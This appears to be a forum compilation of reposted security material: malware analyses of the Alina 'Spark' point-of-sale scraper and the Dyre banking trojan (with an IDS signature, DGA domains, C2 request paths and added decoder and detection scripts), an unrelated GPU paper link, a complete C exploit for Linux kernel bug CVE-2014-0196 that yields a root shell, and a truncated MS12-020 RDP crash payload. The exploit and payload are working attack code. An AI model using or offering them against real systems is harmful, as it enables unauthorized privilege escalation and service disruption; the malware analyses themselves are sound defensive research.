Previous versions of Alina picked a name from a list of legitimate sounding executable names and copied itself into the oh-so-common %APPDATA% folder under the chosen name. Instead, Spark creates a sub-folder in (surprise) %APPDATA% called "Install" and stores its malicious goodies in there. These malicious goodies include copying the original executable to %APPDATA%/Install/hkcmd.exe and writing a file called ntfs.dat. Spark will always copy itself as hkcmd.exe as opposed to previous Alina versions that selected from a list of varying names.

Figure 3: Spark Install Directory

At startup, the malware builds the path to %APPDATA%/Install/ntfs.dat and checks to see if the file exists. If the file does not exist, it uses the system's volume serial ID and overwrites the first 6 digits with random upper and/or lower case characters. The result of this operation is written to ntfs.dat and is used as the unique ID for the bot. Here is an example:

Volume ID => "602C0256"
Random chars => "mRtyfo"
Unique ID => "mRtyfo56"

Figure 4: Random Character Generation

This differs from earlier variants, which just used the volume serial ID to identify the bot. If the ntfs.dat does exist, the identifier is read into memory. This unique identifier is included in the POST message for all communication with the C&C server. Like all the other versions of Alina, Spark also adds itself to the commonly used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hkcmd key in order to maintain persistence through reboot. Spark uses a named pipe to synchronize moving the malware from its original execution folder to the %APPDATA%/Install directory. The pipe name is generated as \\.\pipe\spark<uniqueID> where <uniqueID> is the same as what is generated above. Using our previous example the pipe name would be \\.\pipe\sparkmRtyfo56.

Black List

Alina includes a black list of processes that are not scraped for CC data. Spark takes the same black list as before and adds additional applications to the list:

Figure 5: Black List Differences

Since the author is looking for CC data, the choice to add additional processes is an easy one since these applications are highly unlikely to contain the data they are seeking. The majority of the additions are system and common processes.

Spark Execution Flow

Here is a general picture overview of Spark's execution flow:

Figure 6: Spark Execution Flow

Communication

The final two differences in this variant have to do with communication to the C&C server. Where previous versions used "Alina vx.x" as the User-Agent, Spark now uses something that is supposed to look legitimate.

Figure 7: Spark POST Example

As you can see, in their attempts to look legitimate, the author still includes the bot version but forgets to include the closing parenthesis. Here is an IDS signature that has been used to detect Spark.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN JackPOS Checkin"; flow:established,to_server; content:"POST"; http_method; content:".php"; http_uri; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT 5.1|3b| InfoPath.1 Spark v1.1|0d 0a|"; http_header; fast_pattern:66,20; content:!"Referer|3a|"; http_header; pcre:"/\.php$/U"; reference:md5,3959fb5b5909d9c6fb9c9a408d35f67a; reference:url,trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-ram-scraper-malware.pdf; classtype: slr-et; sid:4004777; rev:1;)

This signature refers to the sample as JackPOS, but I think this sample falls somewhere in the spectrum of malware between Alina and JackPOS. As you can see the Spark name has come up several times, both in the POST communication and the named pipe used by the malware. The usage of a version number suggests that the malware author had intentions to produce additional versions. The POST data communication with the C&C server retains the same structure as Alina from v5.2 on, however, Spark chose to reverse the order of the XOR scheme used.

Figure 8: XOR'd POST Data

To recover the clear text message, bytes 18 through 35 (red) are used as a running XOR key for bytes 76 (green) to the end of the data and then the entire message is XOR'd with 0xAA. This will decrypt the entire message. The yellow section (including the red bytes) contains the header information, while the green is the dynamic data. Earlier variants would first XOR the entire message with 0xAA and then grab bytes 18-35 to decode bytes from 76 to the end. A minor change, but sufficient in that it breaks any tools made to decode any prior communications. I've written a ruby script that decodes and parses the traffic and can be found at spark.rb.

JackPOS

Spark and JackPOS have several similar techniques that relate them. The use of the AutoIt compiled script as a loader is a technique that we have not seen very much and its use with both JackPOS and Spark is a very interesting link. Both use similar blacklist approaches as well as custom functions for finding CC data. However, JackPOS almost exclusively attempts to masquerade as java or a java utility. It also either copies itself directly into the %APPDATA% directory or into a java based sub-directory inside %APPDATA%. JackPOS uses the MAC address as a bot ID and base64 encodes the CC data found on the system in order to obfuscate the exfiltration. In case you missed the link above, here is SpiderLabs' detailed write-up on JackPOS. It seems fairly clear that these are two different variants. So while these two samples appear to be related, Spark bears a much stronger resemblance to Alina than JackPOS.

Conclusion

There have been rumors and conjecture about Alina source code being sold off as well as JackPOS being a successor to the Alina code base. While I don't have a pony in the race, the Spark variant shows that someone has been updating the Alina source code recently. The Spark string that shows up in both the named pipe and the POST communication shows an obvious distinction from previous Alina versions. The use of AutoIt as a loader for both Spark and JackPOS variants indicates that it could have potentially been a version between the transition from Alina to JackPOS. I believe it was Shakespeare who said, "Malware by any other name will still steal your credit card data", or something to that effect. Regardless of what you call these variants, the important part is to understand the details of this threat and how to keep your data secure.

Posted by Eric Merritt on 18 December 2014 at 09:00

Sursa: Alina POS malware "sparks" off a new variant - SpiderLabs
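Added example, not the post's spark.rb: a Python decoder for the Spark POST body as described above, beside the earlier Alina order, run on a constructed message to show that the old order leaves the dynamic data wrong by exactly 0xAA while the header still looks right. Offsets are 0-based, the byte ranges are taken as inclusive, and restarting the running key at byte 76 is an assumption.

```python
"""Decode Spark / Alina v5.2+ POST bodies (added example, not SpiderLabs code).
Assumptions: 0-based offsets, inclusive ranges from the write-up, and the
running key restarting at byte 76."""

KEY_START, KEY_END = 18, 36   # bytes 18 through 35 hold the running XOR key
DATA_START = 76               # dynamic data begins at byte 76
MASK = 0xAA                   # whole-message XOR constant


def _running_xor(msg: bytes, key: bytes, start: int) -> bytes:
    """XOR msg[start:] with key repeated; bytes before start are untouched."""
    out = bytearray(msg)
    for i in range(start, len(out)):
        out[i] ^= key[(i - start) % len(key)]
    return bytes(out)


def _xor_all(msg: bytes) -> bytes:
    return bytes(b ^ MASK for b in msg)


def decode_spark(msg: bytes) -> bytes:
    """Spark order: running key first (taken from the still-encoded header),
    then the whole message is XORed with 0xAA."""
    if len(msg) < DATA_START:
        raise ValueError("message shorter than the 76-byte header")
    key = msg[KEY_START:KEY_END]
    return _xor_all(_running_xor(msg, key, DATA_START))


def decode_alina(msg: bytes) -> bytes:
    """Earlier Alina order: 0xAA first, then the running key taken from the
    already-decoded header."""
    if len(msg) < DATA_START:
        raise ValueError("message shorter than the 76-byte header")
    step1 = _xor_all(msg)
    return _running_xor(step1, step1[KEY_START:KEY_END], DATA_START)


def encode_spark(plain: bytes) -> bytes:
    """Inverse of decode_spark; used here only to build test traffic."""
    step1 = _xor_all(plain)
    return _running_xor(step1, step1[KEY_START:KEY_END], DATA_START)


def encode_alina(plain: bytes) -> bytes:
    """Inverse of decode_alina; used here only to build test traffic."""
    return _xor_all(_running_xor(plain, plain[KEY_START:KEY_END], DATA_START))


def split_message(plain: bytes):
    """Header (bytes 0-75) and dynamic data, as the write-up's figure divides them."""
    return plain[:DATA_START], plain[DATA_START:]


# Constructed sample: a 76-byte header carrying the bot ID from the write-up,
# followed by constructed (fake) scraped data. No real card data.
SAMPLE_HEADER = (b"Spark v1.1|mRtyfo56|" + b"0123456789abcdef" * 4)[:DATA_START]
SAMPLE_DATA = b"proc=pos.exe;track=<constructed sample, not a real card>"
SAMPLE_PLAIN = SAMPLE_HEADER + SAMPLE_DATA
SAMPLE_SPARK_POST = encode_spark(SAMPLE_PLAIN)

if __name__ == "__main__":
    header, data = split_message(decode_spark(SAMPLE_SPARK_POST))
    print("Spark decoder  :", data)
    # The pre-Spark decoder recovers the header but every data byte is off by 0xAA.
    print("Alina decoder  :", split_message(decode_alina(SAMPLE_SPARK_POST))[1])
```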
-
How GPUs Work

David Luebke, NVIDIA Research
Greg Humphreys, University of Virginia

In the early 1990s, ubiquitous interactive 3D graphics was still the stuff of science fiction. By the end of the decade, nearly every new computer contained a graphics processing unit (GPU) dedicated to providing a high-performance, visually rich, interactive 3D experience. This dramatic shift was the inevitable consequence of consumer demand for videogames, advances in manufacturing technology, and the exploitation of the inherent parallelism in the feed-forward graphics pipeline. Today, the raw computational power of a GPU dwarfs that of the most powerful CPU, and the gap is steadily widening.

Download: http://www.cs.virginia.edu/~gfx/papers/pdfs/59_HowThingsWork.pdf
-
Dyre Banking Trojan

Author: Brett Stone-Gross and Pallav Khandhar, Dell SecureWorks Counter Threat Unit™ Threat Intelligence
Date: 17 December 2014
URL: Dyre Banking Trojan | Dell SecureWorks

Summary

Threat actors regularly develop new Trojan horse malware to fuel their operations and to ensure the longevity of their botnets. After the takedowns of the Gameover Zeus and Shylock botnets, researchers predicted that a new breed of banking malware would fill the void. In early June 2014, the Dell SecureWorks Counter Threat Unit (CTU) research team discovered the Dyre banking trojan, which was being distributed by Cutwail botnet spam emails that included links to either Dropbox or Cubby file storage services. The threat actors later shifted to distribution via the Upatre downloader trojan. Dyre is also known as Dyreza, Dyzap, and Dyranges by the antivirus industry.

Capabilities

Dyre harvests credentials, primarily targeting online banking websites to perform Automated Clearing House (ACH) and wire fraud. The malware includes a modular architecture, man-in-the-browser functionality, and a backconnect server that allows threat actors to connect to a bank website through the victim's computer. The man-in-the-browser functionality is based on a unique combination of redirects to fake websites controlled by the threat actor ("web fakes") and a dynamic web inject system that allows the threat actors to manipulate a financial institution's website content. Similar to other banking trojans, Dyre hooks into the most popular web browsers to intercept traffic from a victim's system, stealing information and manipulating website content before it is rendered by the browser. Early versions of Dyre were relatively primitive, sending command and control (C2) communications and stolen data via unencrypted HTTP. Recent iterations of Dyre use SSL to encrypt all C2 communications, as well as a custom encryption algorithm. Dyre also uses RSA cryptography to digitally sign configuration files and malware plugins to prevent tampering.

Malware distribution

Each Dyre binary has an ID value that allows the malware operators to identify the campaign associated with each compromise. These campaigns are often localized to target specific geographic regions. Since Dyre's introduction, the CTU research team has identified 21 unique Dyre campaigns (see Figure 1). As of this publication, Dyre has targeted more than 242 financial institutions.

Figure 1. Distribution of active Dyre campaigns observed by CTU researchers as of this publication. (Source: Dell SecureWorks)

Malware distribution vector

Dyre is downloaded and installed on compromised systems by the Upatre downloader trojan, which is distributed through spam emails sent by the Cutwail botnet and at least two other spam botnets. The emails contain Upatre as an embedded malware executable in a ZIP attachment (see Figure 2) or as a malicious URL. In both instances, user interaction is required to compromise the targeted system. Dyre campaigns use different lures, such as impersonating FedEx invoices, electronic faxes, and payroll or financial documents.

Figure 2. Spam email lure samples dropping Dyre via Upatre downloader as an attachment. (Source: Dell SecureWorks)

Architecture

The Dyre malware is packed and obfuscated in multiple layers, and it is divided into two modules: the dropper and the main DLL module. The DLL module is stored in two distinct resources named payload32 and payload64, which Dyre activates on 32-bit or 64-bit Windows platforms, respectively. The malware drops a slightly modified copy of itself, using a random filename like "tlBTyLNuJkruXja.exe," in the C:\Windows folder (see Figure 3). When Dyre launches this file, malicious code is injected into svchost.exe.

Figure 3. Default location for dropped Dyre files. (Source: Dell SecureWorks)

For persistence, Dyre registers as a system service under "Google Update Service" by adding an HKLM\SYSTEM\ControlSet001\Services\googleupdate registry key (see Figure 4).

Figure 4. Dyre's persistence mechanism. (Source: Dell SecureWorks)

The malware hides its base configuration file, RSA key, and other important data within the resource section of the Dyre DLL (see Figure 5).

Figure 5. Dyre resource section containing important data. (Source: Dell SecureWorks)

Dyre beacons to the hard-coded IP addresses listed in the base configuration file. The first request registers a bot on the C2 server. The malware sends the compromised system's operating system information to the C2 server and continues beaconing requests.

Dyre's web inject engine uses a slightly different approach than other banking trojans. The injected process hooks code into Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer, intercepting victims' credentials when they log into a bank account or other financial service. For each web browser, Dyre hooks different functions within the loaded DLLs:

Firefox: PR_Read and PR_Write functions within nspr4.dll
Chrome: ssl_read and ssl_write functions within chrome.dll
Internet Explorer: functions within wininet.dll

When a victim on a compromised system visits one of the targeted banking websites and enters login credentials, Dyre intercepts the data and sends a POST request to the threat actor's drop server. The request includes cookies and browser information. The malware can also manipulate banking website content dynamically, which can be used to circumvent two-factor authentication schemes.

Command and control traffic

Dyre contacts Google to check network connectivity and then submits a Session Traversal Utilities for NAT (STUN) binding request (see Figure 6). STUN allows a system located behind a network address translator (NAT) to discover a public IP address.

Figure 6. Dyre's network connectivity check and STUN requests. (Source: Dell SecureWorks)

The STUN servers listed in Table 1 are hard-coded in the Dyre binary.

[TABLE=class: tabularr]
[TR] [TD]stun1.voiceeclipse.net[/TD] [TD]stun.callwithus.com[/TD] [TD]stun.sipgate.net[/TD] [/TR]
[TR] [TD]stun.ekiga.net[/TD] [TD]stun.ideasip.com[/TD] [TD]stun.internetcalls.com[/TD] [/TR]
[TR] [TD]stun.noc.ams-ix.net[/TD] [TD]stun.phonepower.com[/TD] [TD]stun.voip.aebc.com[/TD] [/TR]
[TR] [TD]stun.voipbuster.com[/TD] [TD]stun.voxgratia.org[/TD] [TD]stun.ipshka.com[/TD] [/TR]
[TR] [TD]stun.faktortel.com.au[/TD] [TD]stun.iptel.org[/TD] [TD]stun.voipstunt.com[/TD] [/TR]
[TR] [TD]stunserver.org[/TD] [TD]s1.taraba.net[/TD] [TD]s2.taraba.net[/TD] [/TR]
[TR] [TD]stun.l.google.com:19302[/TD] [TD]stun1.l.google.com:19302[/TD] [TD]stun2.l.google.com:19302[/TD] [/TR]
[TR] [TD]stun3.l.google.com:19302[/TD] [TD]stun4.l.google.com:19302[/TD] [TD]stun.schlund.de[/TD] [/TR]
[TR] [TD]stun.rixtelecom.se[/TD] [TD]stun.voiparound.com[/TD] [TD]numb.viagenie.ca[/TD] [/TR]
[TR] [TD]stun.stunprotocol.org[/TD] [TD]stun.2talk.co.nz[/TD] [TD][/TD] [/TR]
[/TABLE]

Table 1. Hard-coded STUN servers.

To hide its backend infrastructure, Dyre deploys a set of proxy servers that act as C2 servers. As shown in Figure 7, these servers are primarily located in North America and Europe. The threat actors have also implemented additional methods to maintain control of the botnet.

Figure 7. Geographic distribution of Dyre C2 servers. (Source: Dell SecureWorks)

Dyre uses SSL to communicate with its C2 server. The requests use a standard structure, substituting appropriate values for the <Campaign ID>, <Bot ID>, and <Architecture> variables:

GET /<Campaign ID>/<Bot ID>/5/cert/EXT-IP/HTTP/1.1 (Register the Bot)
GET /<Campaign ID>/<Bot ID>/0/Win_XP_32bit/1023/EXT-IP/HTTP/1.1 (Register OS of Bot)
GET /<Campaign ID>/<Bot ID>/1/FcJgUwyCWvgLPymGiJGwUkwCVcBMmiD/EXT-IP/ (Send live signal)
GET /<Campaign ID>/<Bot ID>/5/httprdc/EXT-IP/HTTP/1.1 (Ask for web fakes configuration data with target list)
GET /<Campaign ID>/<Bot ID>/5/respparser/EXT-IP/HTTP/1.1 (Request dynamic web inject configuration)
GET /<Campaign ID>/<Bot ID>/5/twg<Architecture>/EXT-IP/HTTP/1.1 (Request I2P plugin)
GET /<Campaign ID>/<Bot ID>/5/i2p<Architecture>/EXT-IP/HTTP/1.1 (Request grabber plugin)
GET /<Campaign ID>/<Bot ID>/5/n_vnc<Architecture>/EXT-IP/HTTP/1.1 (Request VNC plugin)
GET /<Campaign ID>/<Bot ID>/5/n_tv<Architecture>/EXT-IP/HTTP/1.1 (Request TV plugin)
GET /<Campaign ID>/<Bot ID>/5/cfg_bc/EXT-IP/HTTP/1.1 (Request Back Connect plugin)
GET /<Campaign ID>/<Bot ID>/14/NAT/Port%20restricted%20NAT/0/EXT-IP/ (NAT status)

Figure 8 shows a Dyre request for the configuration file identifying the list of URLs to redirect to the malicious server hosting the web fake. The C2 server's reply is encrypted with a custom encryption algorithm, and the payload is digitally signed using a 1024-bit RSA key.

Figure 8. Dyre's configuration request to the C2 server. (Source: Dell SecureWorks)

Dyre performs a man-in-the-browser attack to steal data sent to a legitimate bank website. The malware sends the stolen data to its exfiltration server in an HTTP POST request (see Figure 9).

Figure 9. Dyre HTTP POST request to exfiltration server. (Source: Dell SecureWorks)

Command and control resiliency

Since Dyre's inception, it has relied upon a set of hard-coded proxy servers to communicate with its backend infrastructure. The threat actors have implemented two mechanisms to maintain control of the botnet if the proxies are unreachable: a domain generation algorithm and a plugin that integrates with an anonymization network called I2P.

Domain generation algorithm

Similar to other malware families, Dyre uses a domain generation algorithm (DGA) that is seeded by the current date. It generates 1,000 34-character domains per day, which are appended to one of eight country code top-level domains (ccTLDs) in Asia and the Pacific Islands: .cc, .ws, .to, .in, .hk, .cn, .tk, and .so. The following domains were generated on December 8, 2014:

y3aaa48a7056d7075c3760cdbd90a75b8f.cc
z376dfe4955a257a78944864dd0158d172.ws
a8377c5a7c390331b15c1df94fa745e38a.to
ba3be71036fc2c06d603a2b17d41ffe71a.in
c9cca04cec2588918820cf33ba4337cca8.hk
dec4f75e53d7202136164e2b26456dabdf.cn
e3d68349d47efa0d5a9a92b1239bc4d48c.tk
f85db5ce8675f53b61f00ca0e822a33312.so

CTU researchers sinkholed a Dyre DGA domain to identify sources of infection and to ascertain the number of compromised systems that resorted to the DGA for command and control. During a 24-hour interval, the sinkhole received requests from 8,815 unique IP addresses. The U.S. led the number of compromised systems with 59%, followed by Canada with 8%, Portugal with 7%, the UK with 5%, and Turkey with 3% (see Figure 10).

Figure 10. Infected Dyre bots reaching out to DGA domains. (Source: Dell SecureWorks)

I2P

The Invisible Internet Project (I2P) is an overlay network similar to Tor that offers anonymity. It provides anonymous hosting known as eepSites, which are similar to Tor's hidden services. eepSites allow users to access websites in a way that masks the true location of the server, so that it cannot be easily identified and taken down. On December 3, 2014, CTU researchers observed a Dyre sample that included the following I2P eepSite domain: nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p.

Dyre's implementation of an I2P plugin has several tradeoffs. It makes the malware's backend server more difficult to trace, and the encapsulation of Dyre requests using I2P's encrypted protocol could complicate development of network-based signatures. However, I2P has not been widely adopted, so its presence may also be used to identify compromises.

Connection to Gozi Neverquest

CTU researchers have observed a relationship between the Dyre trojan and the Neverquest variant of Gozi. On several occasions, Gozi Neverquest pushed commands to download and execute a Dyre executable, and there have been other instances of Dyre issuing commands to download and execute a Gozi Neverquest executable. These examples suggest that one or more of the same threat actors are involved with both botnets, and they may leverage each trojan according to their specific needs.

Conclusion

Dyre has emerged from its early stages of development to become one of the most prominent banking trojans. Each iteration included refinements and new features to make it more powerful and robust. The version of Dyre being distributed as of this publication provides advanced capabilities with web fakes, dynamic web injects, a modular design, and multiple methods for maintaining command and control. The introduction of Dyre shortly after the takedown of Gameover Zeus shows the determination of threat actors targeting the financial vertical.

Threat indicators

The threat indicators in Table 2 can be used to detect activity related to the Dyre banking malware. The IP addresses listed in the indicators table may contain malicious content, so consider the risks before opening them in a browser.
Table 2. Threat indicators for the Dyre trojan.

Sursa: Dyre Banking Trojan | Dell SecureWorks © Dell SecureWorks
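Added example, not SecureWorks code: a small Python checker that flags DNS lookups matching the shape of the DGA domains listed above (one letter, 33 hex characters, one of the eight ccTLDs; a heuristic derived from the eight published samples, not Dyre's generation routine) and decodes C2 request paths with the structure shown above, run over constructed log lines. The log format, campaign and bot ID values and IP addresses are constructed, and C2 paths are only visible this way where the SSL traffic is inspected.

```python
"""Flag Dyre DGA lookups and C2 beacon paths in a constructed log (added
example, not SecureWorks code). Log lines are assumed to look like
'<timestamp> <client-ip> DNS <name>' or '<timestamp> <client-ip> GET <path> HTTP/1.1'."""
import re
from typing import Optional

# Shape of the published DGA samples: a letter, 33 hex chars (34 total) and
# one of the eight ccTLDs. Heuristic only; Dyre's own algorithm is not shown.
DGA_TLDS = ("cc", "ws", "to", "in", "hk", "cn", "tk", "so")
DGA_RE = re.compile(r"^[a-z][0-9a-f]{33}\.(%s)$" % "|".join(DGA_TLDS))

# C2 path: /<Campaign ID>/<Bot ID>/<command>/<argument(s)>/<external IP>/
C2_RE = re.compile(
    r"^/(?P<campaign>[^/]+)/(?P<bot>[^/]+)/(?P<cmd>\d+)/(?P<args>.+?)"
    r"/(?P<ext_ip>\d{1,3}(?:\.\d{1,3}){3})/?$"
)

# (command, first argument) pairs as listed in the write-up; None = any argument.
COMMANDS = {
    ("5", "cert"): "register bot",
    ("0", None): "register OS",
    ("1", None): "live signal",
    ("5", "httprdc"): "web fakes configuration",
    ("5", "respparser"): "dynamic web inject configuration",
    ("5", "cfg_bc"): "back connect plugin",
    ("14", "NAT"): "NAT status",
}
# Plugin requests carry the architecture suffix, so match on the prefix.
PLUGIN_PREFIXES = {"twg": "I2P plugin", "i2p": "grabber plugin",
                   "n_vnc": "VNC plugin", "n_tv": "TV plugin"}


def is_dga_domain(name: str) -> bool:
    """True if the queried name has the shape of the listed DGA domains."""
    return DGA_RE.match(name.strip().lower().rstrip(".")) is not None


def parse_c2_path(path: str) -> Optional[dict]:
    """Decode a request path into campaign, bot, command and meaning, or None."""
    m = C2_RE.match(path)
    if not m:
        return None
    cmd = m.group("cmd")
    first = m.group("args").split("/")[0]
    meaning = COMMANDS.get((cmd, first)) or COMMANDS.get((cmd, None))
    if meaning is None and cmd == "5":
        for prefix, label in PLUGIN_PREFIXES.items():
            if first.startswith(prefix):
                meaning = label
    return {"campaign": m.group("campaign"), "bot": m.group("bot"),
            "cmd": cmd, "meaning": meaning or "unknown",
            "ext_ip": m.group("ext_ip")}


def scan_log(lines):
    """Return (client, kind, detail) for every line that looks Dyre-related."""
    hits = []
    for line in lines:
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue
        _ts, client, kind, value = parts
        if kind == "DNS" and is_dga_domain(value):
            hits.append((client, "dga-lookup", value))
        elif kind == "GET":
            beacon = parse_c2_path(value.split(" ")[0])
            if beacon:
                hits.append((client, "c2-" + beacon["meaning"], beacon))
    return hits


# Constructed log: two DGA samples from the write-up, one benign lookup, four
# beacons with constructed campaign/bot IDs and IPs, and one benign request.
SAMPLE_LOG = """\
2014-12-08T09:15:01Z 10.1.2.34 DNS y3aaa48a7056d7075c3760cdbd90a75b8f.cc
2014-12-08T09:15:01Z 10.1.2.34 DNS www.example.com
2014-12-08T09:15:02Z 10.1.2.34 DNS f85db5ce8675f53b61f00ca0e822a33312.so
2014-12-08T09:15:03Z 10.1.2.34 GET /CAMPAIGN-ID/BOT-ID-0001/5/cert/203.0.113.7/ HTTP/1.1
2014-12-08T09:15:04Z 10.1.2.34 GET /CAMPAIGN-ID/BOT-ID-0001/0/Win_XP_32bit/1023/203.0.113.7/ HTTP/1.1
2014-12-08T09:15:05Z 10.1.2.34 GET /CAMPAIGN-ID/BOT-ID-0001/5/n_vnc32/203.0.113.7/ HTTP/1.1
2014-12-08T09:15:06Z 10.1.2.34 GET /CAMPAIGN-ID/BOT-ID-0001/14/NAT/Port%20restricted%20NAT/0/203.0.113.7/ HTTP/1.1
2014-12-08T09:15:07Z 10.1.2.35 GET /images/logo.png HTTP/1.1
"""

if __name__ == "__main__":
    for client, kind, detail in scan_log(SAMPLE_LOG.splitlines()):
        print(client, kind, detail)
```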
-
CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

/*
 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
 * condition
 *
 * Slightly-less-than-POC privilege escalation exploit
 * For kernels >= v3.14-rc1
 *
 * Matthew Daley <mattd@bugfuzz.com>
 *
 * Usage:
 *   $ gcc cve-2014-0196-md.c -lutil -lpthread
 *   $ ./a.out
 *   [+] Resolving symbols
 *   [+] Resolved commit_creds: 0xffffffff81056694
 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
 *   [+] Doing once-off allocations
 *   [+] Attempting to overflow into a tty_struct...............
 *   [+] Got it
 *   # id
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
 * chance that the overflow will go off the end of a slab. This does not
 * necessarily lead to an immediate kernel crash, but you should be prepared
 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
 * avoidable by reading /proc/slabinfo on systems where it is still available
 * to unprivileged users.
 *
 * Caveat: The vulnerability should be exploitable all the way from
 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
 * exploit relies on.
 *
 * Thanks to Jon Oberheide for his help on exploitation technique.
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS 30

struct device;
struct tty_driver;
struct tty_operations;

typedef struct {
    int counter;
} atomic_t;

struct kref {
    atomic_t refcount;
};

struct tty_struct_header {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {
    commit_creds(prepare_kernel_cred(0));

    return 0;
}

unsigned long get_symbol(char *target_name) {
    FILE *f;
    unsigned long addr;
    char dummy;
    char name[256];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL)
        return 0;

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
        if (ret == 0) {
            fscanf(f, "%s\n", name);
            continue;
        }

        if (!strcmp(name, target_name)) {
            printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

            fclose(f);
            return addr;
        }
    }

    printf("[-] Couldn't resolve \"%s\"\n", name);

    fclose(f);
    return 0;
}

void *overwrite_thread_fn(void *p) {
    write(slave_fd, buf, 511);
    write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
    write(slave_fd, &overwrite, sizeof(overwrite));
}

int main() {
    char scratch[1024] = {0};
    void *tty_operations[64];
    int i, temp_fd_1, temp_fd_2;

    for (i = 0; i < 64; ++i)
        tty_operations[i] = payload;

    overwrite.magic = TTY_MAGIC;
    overwrite.kref.refcount.counter = 0x1337;
    overwrite.dev = (struct device *)scratch;
    overwrite.driver = (struct tty_driver *)scratch;
    overwrite.ops = (struct tty_operations *)tty_operations;

    puts("[+] Resolving symbols");
    commit_creds = (commit_creds_fn)get_symbol("commit_creds");
    prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
    if (!commit_creds || !prepare_kernel_cred)
        return 1;

    puts("[+] Doing once-off allocations");
    for (i = 0; i < ONEOFF_ALLOCS; ++i)
        if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
            puts("[-] pty creation failed");
            return 1;
        }

    printf("[+] Attempting to overflow into a tty_struct...");
    fflush(stdout);

    for (i = 0; ; ++i) {
        struct termios t;
        int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
        pthread_t overwrite_thread;

        if (!(i & 0xfff)) {
            putchar('.');
            fflush(stdout);
        }

        if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
            puts("\n[-] pty creation failed");
            return 1;
        }

        for (j = 0; j < RUN_ALLOCS; ++j)
            if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
                puts("\n[-] pty creation failed");
                return 1;
            }

        close(fds[RUN_ALLOCS / 2]);
        close(fds2[RUN_ALLOCS / 2]);

        write(slave_fd, buf, 1);

        tcgetattr(master_fd, &t);
        t.c_oflag &= ~OPOST;
        t.c_lflag |= ECHO;
        tcsetattr(master_fd, TCSANOW, &t);

        if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
            puts("\n[-] Overwrite thread creation failed");
            return 1;
        }
        write(master_fd, "A", 1);
        pthread_join(overwrite_thread, NULL);

        for (j = 0; j < RUN_ALLOCS; ++j) {
            if (j == RUN_ALLOCS / 2)
                continue;

            ioctl(fds[j], 0xdeadbeef);
            ioctl(fds2[j], 0xdeadbeef);
            close(fds[j]);
            close(fds2[j]);
        }

        ioctl(master_fd, 0xdeadbeef);
        ioctl(slave_fd, 0xdeadbeef);
        close(master_fd);
        close(slave_fd);

        if (!setresuid(0, 0, 0)) {
            setresgid(0, 0, 0);

            puts("\n[+] Got it :)");
            execl("/bin/bash", "/bin/bash", NULL);
        }
    }
}

Sursa: [C] CVE-2014-0196: Linux kernel 12/05/2014 - Pastebin.com
-
# MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept
# BlackBap.Org
import socket
import sys

buf = b""
buf += b"\x03\x00\x00\x13"  # TPKT, version 3, length 19
buf += b"\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00"  # ITU-T Rec X.224
buf += b"\x03\x00\x01\xd6"  # TPKT, version 3, length 470
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x7f\x65\x82\x01\x94\x04"  # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf += b"\x01\x01\x04\x01\x01\x01\x01\xff"  # "Fuck you Chelios" packet
buf += b"\x30\x19\x02\x04\x00\x00\x00\x00"
buf += b"\x02\x04\x00\x00\x00\x02\x02\x04"
buf += b"\x00\x00\x00\x00\x02\x04\x00\x00"
buf += b"\x00\x01\x02\x04\x00\x00\x00\x00"
buf += b"\x02\x04\x00\x00\x00\x01\x02\x02"
buf += b"\xff\xff\x02\x04\x00\x00\x00\x02"
buf += b"\x30\x19\x02\x04\x00\x00\x00\x01"
buf += b"\x02\x04\x00\x00\x00\x01\x02\x04"
buf += b"\x00\x00\x00\x01\x02\x04\x00\x00"
buf += b"\x00\x01\x02\x04\x00\x00\x00\x00"
buf += b"\x02\x04\x00\x00\x00\x01\x02\x02"
buf += b"\x04\x20\x02\x04\x00\x00\x00\x02"
buf += b"\x30\x1c\x02\x02\xff\xff\x02\x02"
buf += b"\xfc\x17\x02\x02\xff\xff\x02\x04"
buf += b"\x00\x00\x00\x01\x02\x04\x00\x00"
buf += b"\x00\x00\x02\x04\x00\x00\x00\x01"
buf += b"\x02\x02\xff\xff\x02\x04\x00\x00"
